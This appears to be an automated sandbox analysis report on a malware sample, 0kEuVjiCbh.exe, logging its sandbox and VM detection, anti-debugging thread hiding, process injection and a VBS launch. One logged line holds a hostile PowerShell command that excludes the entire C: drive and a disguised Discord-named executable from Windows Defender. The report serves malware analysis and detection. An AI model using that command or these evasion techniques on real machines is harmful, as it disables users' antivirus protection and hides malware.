Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 0kEuVjiCbh.exe, 00000001.00000002.327234439.0000000002571000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread delayed: delay time: 10454182	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread delayed: delay time: 10464079	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread delayed: delay time: 10454072	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread delayed: delay time: 10463970	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread delayed: delay time: 10453963	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread delayed: delay time: 15894138	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Window / User API: threadDelayed 2019	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3915	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3179	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Window / User API: threadDelayed 2775	Jump to behavior

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe TID: 2332	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4092	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe TID: 5240	Thread sleep count: 2775 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe TID: 5288	Thread sleep time: -230000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe TID: 5240	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe TID: 5276	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe TID: 5248	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe TID: 5276	Thread sleep count: 77 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe TID: 5240	Thread sleep time: -10454182s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe TID: 5288	Thread sleep time: -10464079s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe TID: 5240	Thread sleep time: -10454072s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe TID: 5288	Thread sleep time: -10463970s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe TID: 5240	Thread sleep time: -10453963s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe TID: 5288	Thread sleep time: -15894138s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Thread sleep count: Count: 2775 delay: -10

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_004269D4 GetFullPathNameW,FindFirstFileExW,GetLastError,

19_2_004269D4

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_0044DE59 __EH_prolog,new,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetProductInfo,

19_2_0044DE59

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread delayed: delay time: 10454182	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread delayed: delay time: 10464079	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread delayed: delay time: 10454072	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread delayed: delay time: 10463970	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread delayed: delay time: 10453963	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread delayed: delay time: 15894138	Jump to behavior

Source: powershell.exe, 0000000F.00000003.395812040.000000000583B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: 0kEuVjiCbh.exe, 00000001.00000002.327234439.0000000002571000.00000004.00000001.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: 0kEuVjiCbh.exe, 00000001.00000002.327234439.0000000002571000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: 0kEuVjiCbh.exe, 00000001.00000002.327234439.0000000002571000.00000004.00000001.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: powershell.exe, 0000000F.00000003.395812040.000000000583B000.00000004.00000001.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_0047DA23 NtSetInformationThread ?,00000011,00000000,00000000,?,?,00000000,00000000

19_2_0047DA23

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_00694A7C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

19_2_00694A7C

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_004FA652 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_004FA652

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_006A482C mov eax, dword ptr fs:[00000030h]

19_2_006A482C

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_004B8B6B __EH_prolog,GetProcessHeap,HeapAlloc,

19_2_004B8B6B

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_0068A7EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		19_2_0068A7EA
Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Code function: 19_2_00694A7C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		19_2_00694A7C

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe

Memory written: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Memory written: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Memory written: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Memory written: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe base: 6E0000	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Memory written: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe base: 78C000	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Memory written: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe base: 7A6000	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Memory written: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe base: 7A8000	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Memory written: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe base: 7A9000	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Memory written: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe base: 1371008	Jump to behavior

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs'	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Process created: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe'	Jump to behavior

Source: 0kEuVjiCbh.exe, 00000013.00000003.385233863.0000000003F9B000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: 0kEuVjiCbh.exe, 00000013.00000002.478412280.0000000001E20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: 0kEuVjiCbh.exe, 00000013.00000002.478412280.0000000001E20000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: 0kEuVjiCbh.exe, 00000013.00000002.478412280.0000000001E20000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe

Code function: 19_2_0040EA72 cpuid

19_2_0040EA72

Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Users\user\Desktop\0kEuVjiCbh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0kEuVjiCbh.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
